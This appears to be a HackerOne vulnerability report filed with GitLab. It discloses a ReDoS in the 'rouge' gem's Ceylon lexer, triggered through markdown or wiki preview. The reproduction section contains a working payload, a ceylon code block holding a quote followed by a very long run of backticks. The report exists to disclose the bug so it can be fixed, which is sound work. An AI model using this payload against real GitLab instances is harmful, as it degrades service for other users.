DOS scenario leveraging the Ceylon block in markdown preview
HackerOne report #1403892 by slaydesays on 2021-11-18, assigned to @dcouture:
Report
Summary
In https://hackerone.com/reports/1283484, a ReDoS was reported in the ruby gem "rouge". The Factor and class and GHC Core class have been addressed in rogue version 3.26.1 but the ceylon class remains unfixed.
https://github.com/rouge-ruby/rouge/blob/v3.26.1/lib/rouge/lexers/ceylon.rb#L54
Steps to reproduce
A high CPU load can be caused using the following code in a wiki page:
```ceylon
"````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````
``` See more details on how to reproduce in thread below: #347277 (comment 754132724)
Use htop to monitor CPU.
Results of GitLab environment info
System information
System: Ubuntu 18.04
Current User: git
Using RVM: no
Ruby Version: 2.7.4p191
Gem Version: 3.1.4
Bundler Version:2.1.4
Rake Version: 13.0.6
Redis Version: 6.0.16
Git Version: 2.33.0.
Sidekiq Version:6.2.2
Go Version: unknown
GitLab information
Version: 14.4.1
Revision: 1a23d731c9f
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 12.7
Impact
Continuous requests to e.g. create and preview specially crafted markdown/wiki pages can result in a high CPU load and cause a denial of service.
How To Reproduce
Please add reproducibility information to this section:
Backport Task
-
Backport fix based on slack discussion